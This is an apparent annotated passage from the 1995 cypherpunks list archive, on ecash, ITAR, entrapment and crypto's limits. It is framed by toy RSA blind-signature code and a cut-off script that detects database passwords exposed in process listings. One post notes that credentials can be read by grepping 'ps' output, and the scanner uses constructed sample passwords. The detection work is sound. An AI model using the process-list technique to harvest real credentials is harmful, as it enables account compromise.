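# Constructed toy key: the P-384 and Curve448 field primes. Both are public, so
# this key protects nothing; they are used because each is 2 mod 3, which makes
# gcd(3, (P-1)(Q-1)) = 1 and gives every value exactly one cube root mod N.
P = 2**384 - 2**128 - 2**96 + 2**32 - 1
Q = 2**448 - 2**224 - 1
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))       # x**D mod N is the cube root of x


def bank_sign(x):
    """Bank: return the cube root mod N of whatever arrives, blinded or not."""
    return pow(x, D, N)


def coin_value(serial):
    """Assumed encoding: hash the serial across the whole range 0..N-1, so an
    ordinary integer cube root cannot stand in for the bank's signature."""
    nbytes = (N.bit_length() + 7) // 8 + 16
    digest = hashlib.shake_256(serial).digest(nbytes)
    return int.from_bytes(digest, "big") % N


def blind(m):
    """Client: multiply by the cube of a random r before sending to the bank."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return (m * pow(r, E, N)) % N, r


def unblind(blinded_root, r):
    """Client: divide the bank's answer by r, leaving the cube root of m."""
    return (blinded_root * pow(r, -1, N)) % N


def verify(m, sig):
    """Anyone holding the public key (N, 3): cube the signature and compare."""
    return pow(sig, E, N) == m


def withdraw(serial, blinded=True):
    """One withdrawal; 'bank_saw' is the only value the bank ever receives."""
    m = coin_value(serial)
    if blinded:
        sent, r = blind(m)
        sig = unblind(bank_sign(sent), r)
    else:
        sent = m                        # client chooses to give up anonymity
        sig = bank_sign(sent)
    return {"m": m, "bank_saw": sent, "sig": sig}


if __name__ == "__main__":
    coin = withdraw(b"constructed-serial-0001")
    print("coin verifies:", verify(coin["m"], coin["sig"]))
    print("bank saw the coin value:", coin["bank_saw"] == coin["m"])
```

Both paths yield the same signature on the same coin; only what the bank sees at withdrawal differs, and verify() needs nothing but the public key.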




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 03:01:43 +0800
To: Jay Campbell <edge@got.net>
Subject: Re: crypto for porno users
In-Reply-To: <199511230817.AAA22826@you.got.net>
Message-ID: <199511231839.NAA24795@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jay Campbell writes:
> A common way to get around prostitution sting operations is to ask the lady
> to expose sensitive portions of her anatomy to prove her sincerity before
> the would-be customer commits to any transactions; this sort of thing is
> also becoming commonplace on the net for pornography or pirated software,
> too.

Except that government agents have mailed people kiddie porn as parts
of stings. I wonder if decoy cops will expose themselves, too.

All these urban myths about undercover police are amusing but quite
useless. Yes, cops can lie about if they are cops. Yes, they can do
all sorts of things.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@calum.csclub.uwaterloo.ca (Ian Goldberg)
Date: Fri, 24 Nov 1995 03:04:26 +0800
To: cypherpunks@toad.com
Subject: Re: ecash protocol: Part 1
In-Reply-To: <199511231755.JAA02492@netcom15.netcom.com>
Message-ID: <492fha$1um@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511231755.JAA02492@netcom15.netcom.com>,
Mark Twain Ecash Support <support@marktwain.com> wrote:
>> I wonder if it would be legal to write shop software which sent such a
>> payment request, took the resulting coins, and deposited them in the bank
>> (if we could figure out all the protocols necessary). 
>
>IANAL. What would you hope to gain from creating such a piece of 
>software?
>
A piece of ecash software which does not violate Chaumian patents, does
something useful, and for which we have _source_...

   - Ian "Speaking of which..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Fri, 24 Nov 1995 03:47:47 +0800
To: cypherpunks@toad.com
Subject: Re: Java & Netscape security [NOISE]
In-Reply-To: <9511231357.AA10766@all.net>
Message-ID: <Pa01eD16w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
> This is not correct, at least according to legal precedent.  If someone who
> is from Sun represents themselves as being from Sun (i.e., a Sun.Com email
> address in their signature line), then when they speak (or email) about Sun,
> its products, its policies, etc., they represent Sun.

Yes. On the positive side, the readers are likely to take more seriously
someone who's known to work for the company whose products he's discussing.
E.g., if someone writes from Netcom about Java, and I happen to know that he
works for Sun (even in a totally unrelated division), I'll suspect that he may
know more about Sun products than someone whose affiliation I don't know, and
I'll pay a little more attention to his writings.

The periodic Usenet post _What is Usenet? A second opinion_ by Edward Vielmetti
<emv@msen.com> says:

]- Disclaimers are worthless.  If you post from foobar.com, and put a note
]  on the bottom "not the opinions of foobar inc.,", you may satisfy the
]  lawyers but your corporate reputation still will be affected.  To maintain
]  a separate net.identity, post from a different site.

I agree that disclaimers are worthless. I don't agree that they would satisfy
the lawyers.

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 24 Nov 1995 03:56:44 +0800
To: cypherpunks@toad.com
Subject: How to order Applied Crypto direct from Bruce Schneier
Message-ID: <199511231937.OAA24938@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Several people have asked for this. You might want to email him to ask
if the offer is still open, since this was a while back.

From: Bruce Schneier <schneier@winternet.com>
Subject: Applied Cryptography, 2nd Edition: Ordering Information
Date: Sun, 17 Sep 1995 18:09:34 -0500 (CDT)

The SECOND EDITION of APPLIED CRYPTOGRAPHY is coming in November. 
This is a major rewrite: 50% more words, 7 more chapters, and
over 1600 references.  Not only did I make corrections to the
first edition and add developments since it was published, but I
also included topics left out of the first edition.  (See table
of contents--attached.)

The second edition has lots of new algorithms (including GOST,
Blowfish, RC4, and A5), more information on the Clipper Chip and
key escrow, dozens of new protocols, more information on how PGP
works, detailed information on key management and modes of
operation, and new source code.

The second edition will be published in paperback and hardcover. 
Right now I am making both available at a 15% discount.

*****************************************************************
                          ORDER FORM

Applied Cryptography, 2nd Edition (Hardcover): $70 * .85 = $59.00
Applied Cryptography, 2nd Edition (Softcover): $50 * .85 = $42.00

          Shipping:
                    Air (U.S.):       $5 per book
                    Surface (U.S.):   $3 per book
                    Canada/Mexico:    $7 per book
                    Everywhere else:  $9 per book

Send to:

          Counterpane Systems, 101 E Minnehaha Parkway,
                    Minneapolis, MN  55419

I need payment by check, in U.S. funds drawn on a U.S. bank.  Or a
postal money order.  Sorry, no credit cards.
*****************************************************************

              APPLIED CRYPTOGRAPHY, SECOND EDITION
                       Table of Contents

((Sections in all capitals are either new or substantially
rewritten.))

Foreword by Whitfield Diffie

Preface

Chapter 1:  Foundations
          Terminology; STEGANOGRAPHY; Substitution Ciphers and
          Transposition Ciphers; Simple XOR; One-Time Pads; Computer
          Algorithms; Large Numbers

Part I:  Cryptographic Protocols

Chapter 2:  Protocol Building Blocks
          Introduction to Protocols; Communications using Symmetric
          Cryptography; One-Way Functions; One-Way Hash Functions;
          Communications using Public-Key Cryptography; Digital
          Signatures; Digital Signatures with Encryption; Random and
          Pseudo-Random Sequence Generation

Chapter 3:  Basic Protocols
          Key Exchange; Authentication; AUTHENTICATION AND KEY
          EXCHANGE; FORMAL ANALYSIS OF AUTHENTICATION AND KEY-EXCHANGE
          PROTOCOLS; Multiple-Key Public-Key Cryptography; Secret
          Splitting; Secret Sharing; Cryptographic Protection of
          Databases

Chapter 4:  Intermediate Protocols
          Timestamping Services; Subliminal Channel; Undeniable
          Digital Signatures; DESIGNATED CONFIRMER SIGNATURES; PROXY
          SIGNATURES; Group Signatures; Fail-Stop Digital Signatures;
          Computing with Encrypted Data; Bit Commitment; Fair Coin
          Flips; Mental Poker; ONE-WAY ACCUMULATORS; All-or-Nothing
          Disclosure of Secrets; KEY ESCROW

Chapter 5:  Advanced Protocols
          ZERO-KNOWLEDGE PROOFS; Zero-Knowledge Proofs of Identity;
          Blind Signatures; IDENTITY-BASED PUBLIC-KEY CRYPTOGRAPHY;
          Oblivious Transfer; OBLIVIOUS SIGNATURES; Simultaneous
          Contract Signing; Digital Certified Mail; Simultaneous
          Exchange of Secrets

Chapter 6:  Esoteric Protocols
          SECURE ELECTIONS; Secure Multiparty Computation; Anonymous
          Message Broadcast; DIGITAL CASH

Part II:  Cryptographic Techniques

Chapter 7:  Key Length
          SYMMETRIC KEY LENGTH; PUBLIC-KEY KEY LENGTH; COMPARING
          SYMMETRIC AND PUBLIC-KEY KEY LENGTH; BIRTHDAY ATTACKS
          AGAINST ONE-WAY HASH FUNCTIONS; How Long Should a Key Be?;
          Caveat Emptor

Chapter 8:  Key Management
          Generating Keys; NONLINEAR KEYSPACES; Transferring Keys;
          Verifying Keys; Using Keys; UPDATING KEYS; Storing Keys;
          Backup Keys; Compromised Keys; Lifetime of Keys; Destroying
          Keys; Public-Key Key Management

Chapter 9:  Algorithm Types and Modes
          Electronic Codebook Mode; Block Replay; Cipher Block
          Chaining Mode; Stream Ciphers; Self-Synchronizing Stream
          Ciphers; Cipher-Feedback Mode; Synchronous Stream Ciphers;
          Output-Feedback Mode; Counter Mode; Other Block-Cipher
          Modes; CHOOSING A CIPHER MODE; INTERLEAVING; Block Ciphers
          vs. Stream Ciphers

Chapter 10:  Using Algorithms
          Choosing an Algorithm; Public-Key Cryptography vs. Symmetric
          Cryptography; Encrypting Communications Channels; ENCRYPTING
          DATA FOR STORAGE; Hardware Encryption vs. Software
          Encryption; COMPRESSION, ENCODING, AND ENCRYPTION; DETECTING
          ENCRYPTION; HIDING CIPHERTEXT IN CIPHERTEXT; DESTROYING
          INFORMATION

Part III:  Cryptographic Algorithms

Chapter 11:  Mathematical Background
          Information Theory; Complexity Theory; NUMBER THEORY;
          FACTORING; Prime Number Generation; Discrete Logarithms in a
          Finite Field

Chapter 12:  Data Encryption Standard
          Background; Description of DES; Security of DES; 
          DIFFERENTIAL AND LINEAR CRYPTANALYSIS; THE REAL DESIGN
          CRITERIA; DES VARIANTS; HOW SECURE IS DES TODAY?

Chapter 13:  Other Block Algorithms
          Lucifer; Madryga; Newdes; Feal-N; Redoc; LOKI; Khufu and
          Khafre; RC2; Idea; Mmb; CA-1.1; SKIPJACK

Chapter 14:  Still Other Block Algorithms
          GOST; CAST; BLOWFISH; SAFER K-64; 3-WAY; CRAB; SXAL8/MBAL;
          RC5; OTHER BLOCK ALGORITHMS; THEORY OF BLOCK CIPHER DESIGN;
          USING ONE-WAY HASH FUNCTIONS; CHOOSING A BLOCK ALGORITHM

Chapter 15:  Combining Block Algorithms
          DOUBLE ENCRYPTION; TRIPLE ENCRYPTION; DOUBLING THE BLOCK
          LENGTH; OTHER MULTIPLE ENCRYPTION SCHEMES; CDMF KEY
          SHORTENING; WHITENING; CASCADING MULTIPLE BLOCK ALGORITHMS;
          COMBINING MULTIPLE BLOCK ALGORITHMS

Chapter 16:  Pseudo-Random-Sequence Generators and Stream Ciphers
          Linear Congruential Generators; Linear Feedback Shift
          Registers; LFSRs in Software; DESIGN AND ANALYSIS OF STREAM
          CIPHERS; Stream Ciphers using LFSRs; A5; HUGHES XPD/KPD;
          NANOTEQ; RAMBUTAN; ADDITIVE GENERATORS; GIFFORD; ALGORITHM
          M; PKZIP

Chapter 17:  Other Stream Ciphers and Real Random-Sequence Generators
          RC4; SEAL; WAKE; FEEDBACK WITH CARRY SHIFT REGISTERS; STREAM
          CIPHERS USING FCSRS; NONLINEAR FEEDBACK SHIFT REGISTERS; 
          Other Stream Ciphers; System-Theoretic Approach to Stream
          Cipher Design; Complexity-Theoretic Approach to Stream
          Cipher Design; Other Approaches to Stream Cipher Design;
          CASCADING MULTIPLE STREAM CIPHERS;  CHOOSING A STREAM
          CIPHER; GENERATING MULTIPLE STREAMS FROM A SINGLE PSEUDO-
          RANDOM SEQUENCE GENERATOR; REAL RANDOM-SEQUENCE GENERATORS

Chapter 18:  One-Way Hash Functions
          Background; Snefru; N-HASH; MD4; MD5; MD2; Secure Hash
          Algorithm (SHA); RIPE-MD; Haval; Other One-Way Hash
          Functions; ONE-WAY HASH FUNCTIONS USING SYMMETRIC BLOCK
          ALGORITHMS; Using Public-key Algorithms; CHOOSING A ONE-WAY
          HASH FUNCTION; MESSAGE AUTHENTICATION CODES

Chapter 19:  Public-Key Algorithms
          Background; Knapsack Algorithms; RSA; Pohlig-Hellman; Rabin;
          ElGamal; McEliece; Elliptic Curve Cryptosystems; LUC; FINITE
          AUTOMATON PUBLIC-KEY CRYPTOSYSTEMS

Chapter 20:  Public-Key Digital Signature Algorithms
          Digital Signature Algorithm (DSA); DSA VARIANTS; GOST
          DIGITAL SIGNATURE ALGORITHM; DISCRETE LOGARITHM SIGNATURE
          SCHEMES; Ong-Schnorr-Shamir; Esign; Cellular Automata; Other
          Public-Key Algorithms

Chapter 21:  Identification Schemes
          Feige-Fiat-Shamir; Guillou-Quisquater; Schnorr; CONVERTING
          IDENTIFICATION SCHEMES TO SIGNATURE SCHEMES

Chapter 22:  Key-Exchange Algorithms
          DIFFIE-HELLMAN; STATION-TO-STATION PROTOCOL; Shamir's Three-
          Pass Protocol; COMSET; Encrypted Key Exchange; FORTIFIED KEY
          NEGOTIATION; Conference Key Distribution and Secret
          Broadcasting

Chapter 23:  Special Algorithms for Protocols
          Multiple-Key Public-Key Cryptography; Secret Sharing
          Algorithms; Subliminal Channel; Undeniable Digital
          Signatures; DESIGNATED CONFIRMER SIGNATURES; Computing with
          Encrypted Data; Fair Coin Flips; ONE-WAY ACCUMULATORS; All-
          or-Nothing Disclosure of Secrets; FAIR AND FAILSAFE
          CRYPTOSYSTEMS; Zero-Knowledge Proofs of Knowledge; Blind
          Signatures; Oblivious Transfer; Secure Multiparty
          Computation; Probabilistic Encryption; Quantum Cryptography

Part IV:  The Real World

Chapter 24:  Example Implementations
          IBM Secret-Key Management Protocol; Mitrenet; ISDN; STU-III;
          Kerberos; KryptoKnight; SESAME; IBM COMMON CRYPTOGRAPHIC
          ARCHITECTURE; ISO Authentication Framework; Privacy-Enhanced
          Mail (PEM); Message Security Protocol; PRETTY GOOD PRIVACY
          (PGP); SMART CARDS; PUBLIC-KEY CRYPTOGRAPHY STANDARDS;
          UNIVERSAL ELECTRONIC PAYMENT SYSTEM; CLIPPER; CAPSTONE; AT&T
          MODEL 3600 TELEPHONE SECURITY DEVICE

Chapter 25:  Politics
          NATIONAL SECURITY AGENCY; National Computer Security Center;
          National Institute of Standards and Technology; RSA Data
          Security, Inc.; PUBLIC KEY PARTNERS; International
          Association for Cryptologic Research; RACE Integrity
          Primitives Evaluation; CONDITIONAL ACCESS FOR EUROPE;
          ISO/IEC 9979; PROFESSIONAL, CIVIL LIBERTIES, AND INDUSTRY
          GROUPS; Sci.Crypt; CYPHERPUNKS; Patents; U.S. EXPORT RULES;
          FOREIGN IMPORT AND EXPORT OF CRYPTOGRAPHY; Legal Issues

AFTERWORD BY MATT BLAZE

Source Code
          DES; LOKI91; IDEA; GOST; BLOWFISH; 3-WAY; RC5; A5; SEAL;
          WAKE

References





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Fri, 24 Nov 1995 04:04:10 +0800
To: edge@got.net
Subject: Re: crypto for porno users
Message-ID: <199511231945.OAA03659@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi Jay.

>Date: Thu, 23 Nov 1995 00:17:47 -0800
>From: Jay Campbell <edge@got.net>
>Subject: Re: crypto for porno users


>A law
>enforcement team would be stepping onto shaky ground if they were forced to
>transfer illegal images/etc to a suspected trafficker before getting evidence
>from him. Entrapment is an ugly concept.

We've been hearing about such things (using the mails) for some time.  I
don't know how the cops avoided entrapment when they posed as kiddie porn
customers or pedophiles when they were doing the AOL sting.

>>3. Encryption of porn would work against the kind of porn distribution
>>	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
>>	requires that recipients be identified.
>
>Not at all .. a porn distributor could generate a key pair, use part A to
>encode the images, and disseminate part B thru a variety of outlets -
>publicly posted, sold, passed thru an informal network of like-minded
>netizens...

It's that informal network which is the danger to the pornographer.  The
bigger the network, the closer to certainty that it's been infiltrated.

<begin major soap box issue for me>

Strong authentication via crypto does not create a trusted group.  Trust is
a human:human decision -- subject to severe flaws, none of which are solved
by crypto.  [Can you devise a crypto protocol which will prevent or even
just detect adultery, for example?]  With each additional person, there is
a probability of deception.  For this informal network of yours, deception
by any one participant constitutes a security failure.  If you want to
avoid that, therefore, you need to keep the group *very small*.  If it's
that small, then it's not that interesting a target for LE.

<end major soap box issue for me>

>I would argue the exact opposite - strong crypto would tend to minimize the
>effective take, since there's no guarantee that /anything/ on a perp's
>system will be in the clear. I'll let someone else with a better background
>pound on the 'brute force' section.

Ah -- but that's the point I was making.  Crypto gives the appearance of
security -- whether it's in the informal network or with file storage.
It's often a bank vault door on a cardboard house.  For much of what people
do, especially if there's a large net, it's not rational to expect to
achieve security.  But -- if people have done something to achieve
security, they're likely to be fooled into trusting it to be adequate.

Meanwhile, if *everything* on the perp's machine is encrypted, you're
probably in good shape.  That means he'll be required to type passwords too
often -- so he'll either pick a small one or have some machinery which
stores the password.  Both give cryptanalytic advantages.

This isn't a guarantee that *every* perp will be wide open.  Some won't be.
It means that a bunch of perps will be wide open (out of their own
carelessness -- like the breaks into the Enigma net).

The question you need to look at is not the control-freak question which
Freeh seems concerned with:

A)	the probability that some one perp will manage to hide his data

but rather the SIGINT question:

B)	the expected percentage of perps who will fail to hide their data

Have a good day.

 - Carl




 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Fri, 24 Nov 1995 07:46:10 +0800
To: cypherpunks@toad.com
Subject: Re: Spam the Sign!
In-Reply-To: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>
Message-ID: <199511232322.PAA00782@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Actually, the application of the law tends to be far more reasonable than 
> non-lawyers believe.  This is one of the hardest things to get law 
> students to believe.  But it is a human process, not a mechanical one.
> 
> If you sell a product legally in the US, taking reasonable precautions to
> observe the ITAR and making clear to your customers what their obligations
> are, you have essentially zero risk.  How do I know this?  Many, many,
> many people do exactly that every day, and none have AFAIK even been
> threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
> intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
> make only exportable products so that they don't have the trouble of 
> supporting two different versions, doing 2 kinds of paperwork, etc.
> 
> OTOH, if you hand software to someone to put on an FTP site, nudge, 
> nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
> really are guilty of trying to end-run the ITAR, and the feds may give 
> you a hard time, which after all is their job if you are breaking federal 
> law.
> 
Then suppose you hand software to MIT to put on its export-controlled ftp
site (which would seem to follow your requirements to take reasonable
precautions to observe the ITAR, etc.) and you don't do the nudge, nudge,
wink, wink - BUT you know that it's going to be available on major ftp
sites in Europe within a few hours anyway.  The intent to export isn't 
there, but the export occurs anyway.  Is it the intent, or the knowledge
that's important?

Obviously the intent, or the MIT server would be in jail.

So I demonstrate lack of intent to export, by following MIT's model when I
set up my own 'export controlled' ftp server.  Am I safe?  Or do I need
a note from the NSA or somebody to do this?  And if I do need somebody or
something's 'permission', and they refuse to give it, aren't they using
ITAR to restrict the distribution domestically?  Do I have any options in
this case other than to give up?

Or, to bring it down to a practical question, what's stopping Netscape?  How
does Netscape setting up an 'export controlled' ftp site based on the MIT
version lead to one of their executives going to jail?

I have the feeling that we're talking about two different things here - the
law as it's practiced in the courtroom and the law as it's practiced on the
'streets'.  Obviously, the fact that I feel I'm doing something 'legal'
won't help much if the government decides to do a Phil Zimmermann on me.
But I would be interested in your comments.

-- 
Jeff Simmons                           jsimmons@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 24 Nov 1995 04:50:40 +0800
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: Spam the Sign!
In-Reply-To: <199511230002.QAA01527@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.951123152756.26616C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain



Actually, the application of the law tends to be far more reasonable than 
non-lawyers believe.  This is one of the hardest things to get law 
students to believe.  But it is a human process, not a mechanical one.

If you sell a product legally in the US, taking reasonable precautions to
observe the ITAR and making clear to your customers what their obligations
are, you have essentially zero risk.  How do I know this?  Many, many,
many people do exactly that every day, and none have AFAIK even been
threatened with prosecution.  This is NOT IMHO how the ITAR restricts 
intra-US trade.  The ITAR restrict intra-US trade by inducing people to 
make only exportable products so that they don't have the trouble of 
supporting two different versions, doing 2 kinds of paperwork, etc.

OTOH, if you hand software to someone to put on an FTP site, nudge, 
nudge, wink, wink let's hope it doesn't get exported, ha, ha, then you 
really are guilty of trying to end-run the ITAR, and the feds may give 
you a hard time, which after all is their job if you are breaking federal 
law.

None of this of course goes to the question of whether the ITAR is 
good/bad or un/constitutional.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Fri, 24 Nov 1995 04:57:14 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Disclaimers [WAS Re: Java & Netscape security [NOISE]]
In-Reply-To: <Pa01eD16w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.951123153601.26616D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I don't want to ruin a nice thanksgiving by starting a flamewar.  So let
me just say that whether a post from a Tron.com address by a person saying
"I don't speak for tron corporation" would be held to be a valid
disclaimer is complicated, fact-driven, and (unless there is a state
statute that speaks to the question) a question of what it was reasonable
for an average reasonable recipient to think under the circumstances. 
Anyone who says "precedent says X" on this subject is oversimplifying. 
For one thing there are 50 states.  They may not all have the same answer
for given facts.... 

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Fri, 24 Nov 1995 06:12:43 +0800
To: cme@clark.net (Carl Ellison)
Subject: Re: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232149.PAA21305@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> >A law
> >enforcement team would be stepping onto shaky ground if they were forced to
> >transfer illegal images/etc to a suspected trafficker before getting evidence
> >from him. Entrapment is an ugly concept.
> 
> We've been hearing about such things (using the mails) for some time.  I
> don't know how the cops avoided entrapment when they posed as kiddie porn
> customers or pedophiles when they were doing the AOL sting.

As I recall, the courts have sent the message to the LE community that it's entrapment if they 
entice someone into doing something that they normally wouldn't do.  If you're a kiddie porn dealer, 
and I as a LE officer entice you to sell me some pictures of that cute 8-year-old doing some geezer, 
then that's not entrapment.  If I, on the other hand, try to pressure you (assuming you are a 
law-abiding citizen) into buying such by either misrepresenting the article in question or by 
threatening you with dire consequences if you don't buy, etc. - in other words, forcing or enticing 
you to do something you normally wouldn't do - *that's* entrapment.
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTsaSS9AwzY9LDxAQHZ9AP/ZmGmWQm/cd+osceg0rLj8ZgrPbsXw3hi
5u4RbAjWlazTKydk6JfgDrpfLn+tFr/KhqWE7Zo7wFcgTJcX39PdhuxyO0gnt+lr
BdCjB+qYSei3/TgsoU5XPkMEj+fp22dT1NIxRdDPujDjE1BEz18knQsihngGsZ6X
Iz8TyBe6SIM=
=dJ0W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@cygnus.com>
Date: Fri, 24 Nov 1995 06:13:43 +0800
To: khijol!clark.net!cme@cygnus.com (Carl Ellison)
Subject: Re: crypto for porno users
In-Reply-To: <199511231945.OAA03659@clark.net>
Message-ID: <199511232157.PAA21597@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Strong authentication via crypto does not create a trusted group.  Trust is
> a human:human decision -- subject to severe flaws, none of which are solved
> by crypto.  [Can you devise a crypto protocol which will prevent or even
> just detect adultery, for example?]  With each additional person, there is
> a probability of deception.  For this informal network of yours, deception
> by any one participant constitutes a security failure.  If you want to
> avoid that, therefore, you need to keep the group *very small*.  If it's
> that small, then it's not that interesting a target for LE.

Very true.  Authentication, whether strong or weak, merely says that you are who you say you are -
totally different from this "web of trust" I keep hearing about - and that is *it*.  Do you trust me
any more now than before I started signing my postings? 

> Ah -- but that's the point I was making.  Crypto gives the appearance of
> security -- whether it's in the informal network or with file storage.
> It's often a bank vault door on a cardboard house.  For much of what people
> do, especially if there's a large net, it's not rational to expect to
> achieve security.  But -- if people have done something to achieve
> security, they're likely to be fooled into trusting it to be adequate.
> 
> Meanwhile, if *everything* on the perp's machine is encrypted, you're
> probably in good shape.  That means he'll be required to type passwords too
> often -- so he'll either pick a small one or have some machinery which
> stores the password.  Both give cryptanalytic advantages.

It's well-known that most revelations of encrypted information come from "humint", not from 
mathematical finesse with the encryption scheme.  I especially love Oracle's idea of security - when 
submitting SQL to the Oracle back-end, to automate the process, you feed it your user ID and 
password IN THE CLEAR, ON THE COMMAND LINE.  Any weenie can run "ps -ef/ps -ax" and pipe it to 
grep.  The fact that Larry Ellison won't do anything about it seems to me to be idiocy of the first 
order, and that Oracle doesn't know what it's doing.  It's not even a good database product.  Deity 
only knows why people keep buying it, although that's rather off-topic ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLTuOyS9AwzY9LDxAQEuWAP9EU0LgHHAFQgpR+h2D/u9oZmNR3I2z7Cm
qsEZr0Iy84Cu7fH5vIvy5waDx3OZC+Gc1Z2kFydebxl09rTrY88rYIj0Ezp3Mqjk
25oqSlKoDMJNYC2W6cfhVAx6VBDnuExMi4H/R/8pTUepNSBMyc9z0nG0ivkCbTBz
AQd1jcI3lPU=
=Fvaf
-----END PGP SIGNATURE-----
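
The exposure Ed Carp describes above (a database user ID and password passed as a command-line argument, where any local user can read it from the process list) can be audited for with a short script. This is an added example, not part of the original post or of any vendor's tooling; the ps listing is constructed sample data, and the Oracle client names (sqlplus, sqlldr, exp, imp) and option names it looks for are assumptions to adjust per site.

```python
import os
import re

# Constructed `ps -ef` output (sample data, not from the original post).
SAMPLE_PS = """\
UID        PID  PPID  C STIME TTY          TIME CMD
oracle    1201     1  0 09:00 ?        00:00:01 ora_pmon_ORCL
batch     2314  2290  0 09:15 pts/1    00:00:00 sqlplus -s scott/tiger@ORCL @nightly.sql
batch     2320  2290  0 09:15 pts/1    00:00:00 sqlplus -s /nolog @nightly.sql
web       2411     1  0 09:20 ?        00:00:03 report_gen --user=app --password=hunter2 --out=/tmp/r.csv
alice     2502  2490  0 09:21 pts/2    00:00:00 vi notes/todo.txt
"""

# Assumption: client program names that accept user/password on argv.
ORACLE_CLIENTS = {"sqlplus", "sqlldr", "exp", "imp"}

# user/password[@service], optionally prefixed with userid=
CONNECT_RE = re.compile(
    r"^(?P<pre>(?:userid=)?[^/\s@=]+/)(?P<secret>[^/\s@]+)(?P<post>@\S+)?$",
    re.IGNORECASE,
)
# --password=VALUE style options, checked for every program
FLAG_RE = re.compile(
    r"^(?P<pre>--?(?:password|passwd|pwd)=)(?P<secret>.+)$", re.IGNORECASE
)
# Options whose value is the following argument
BARE_FLAGS = {"--password", "--passwd", "--pwd"}


def scan_argv(argv):
    """Return (findings, redacted_argv) for one process's argument vector."""
    findings, out = [], []
    prog = os.path.basename(argv[0]) if argv else ""
    hide_next = False
    for i, arg in enumerate(argv):
        if hide_next:  # value belonging to a bare --password flag
            findings.append("password-flag")
            out.append("****")
            hide_next = False
            continue
        m = FLAG_RE.match(arg)
        if m:
            findings.append("password-flag")
            out.append(m.group("pre") + "****")
            continue
        if arg.lower() in BARE_FLAGS:
            hide_next = True
            out.append(arg)
            continue
        # Only treat a/b tokens as credentials for known database clients,
        # so ordinary relative paths (vi notes/todo.txt) are not flagged.
        m = CONNECT_RE.match(arg) if i > 0 and prog in ORACLE_CLIENTS else None
        if m:
            findings.append("connect-string")
            out.append(m.group("pre") + "****" + (m.group("post") or ""))
            continue
        out.append(arg)
    return findings, out


def audit_ps(ps_text):
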